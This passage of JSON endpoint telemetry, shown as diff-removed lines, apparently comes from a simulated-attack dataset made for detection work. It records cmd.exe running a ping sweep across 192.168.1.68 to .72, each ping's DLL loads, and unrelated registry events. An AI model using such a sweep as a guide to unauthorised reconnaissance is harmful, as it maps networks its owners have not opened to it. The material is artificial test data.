131883572307020000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572306990000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "event_type": "process", - "pid": 4164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572311840000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.68", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5260, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572312010000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572311990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572312140000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883572314170000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883572314170000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883572314170000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883572315420000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883572315580000, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883572315580000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000002E021A", - "registry_value": "W32:00000000002E021A", - "timestamp": 131883572316050000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000002E021A", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000002E021A\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883572316050000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 5260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572316840000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.69", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7640, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572316990000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572316980000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "event_type": "process", - "pid": 7640, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.70", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1572, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572317560000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317450016, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317610000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317610000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572317610000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "event_type": "process", - "pid": 1572, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572321840000, - "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.71", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5420, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572321980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "event_type": "process", - "pid": 5420, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572326830000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.72", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4564, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572327000000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4564, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572326980000, - "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 